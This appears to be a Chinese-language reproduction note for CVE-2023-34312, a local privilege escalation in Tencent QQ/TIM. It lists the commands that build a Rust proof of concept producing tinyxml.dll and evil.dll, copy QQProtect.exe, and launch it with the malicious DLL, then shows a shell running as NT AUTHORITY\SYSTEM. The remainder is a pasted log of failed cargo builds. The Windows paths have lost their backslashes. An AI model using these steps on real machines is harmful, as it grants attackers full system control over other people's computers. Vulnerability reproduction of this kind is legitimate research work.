【已复现】CVE-2023-34312 腾讯QQ/TIM本地提权

$ cd poc$ cargo +stable-i686-pc-windows-msvc build --release --config "build.rustflags = ["-C", "target-feature=+crt-static"]"

targetreleasetinyxml.dlltargetreleaseevil.dll

C:UsersadminDesktop>copy "C:Program Files (x86)Common FilesTencentQQProtectBinQQProtect.exe"已复制         1 个文件。

$ QQProtect.exe <PATH TO evil.dll>

C:Windowssystem32>whoamint authoritysystem

C:UsersadminDesktopqq-tim-elevation-masterqq-tim-elevation-masterpoc>cargo +stable-i686-pc-windows-msvc build --release --config "build.rustflags = ["-C", "target-feature=+crt-static"]"    Updating crates.io indexwarning: spurious network error (3 tries remaining): [6] Couldn't resolve host name (Could not resolve host: index.crates.io)warning: spurious network error (2 tries remaining): [6] Couldn't resolve host name (Could not resolve host: index.crates.io)warning: spurious network error (1 tries remaining): [6] Couldn't resolve host name (Could not resolve host: index.crates.io)error: failed to get `rhexdump` as a dependency of package `tinyxml v0.1.0 (C:UsersadminDesktopqq-tim-elevation-masterqq-tim-elevation-masterpoctinyxml)`
Caused by:  failed to query replaced source registry `crates-io`
Caused by:  download of config.json failed
Caused by:  failed to download from `https://index.crates.io/config.json`
Caused by:  [6] Couldn't resolve host name (Could not resolve host: index.crates.io)

error: linker `link.exe` not found  |  = note: program not found
note: the msvc targets depend on the msvc linker but `link.exe` was not found
note: please ensure that Visual Studio 2017 or later, or Build Tools for Visual Studio were installed with the Visual C++ option.
note: VS Code is a different product, and is not sufficient.
error: could not compile `proc-macro2` (build script) due to previous errorwarning: build failed, waiting for other jobs to finish...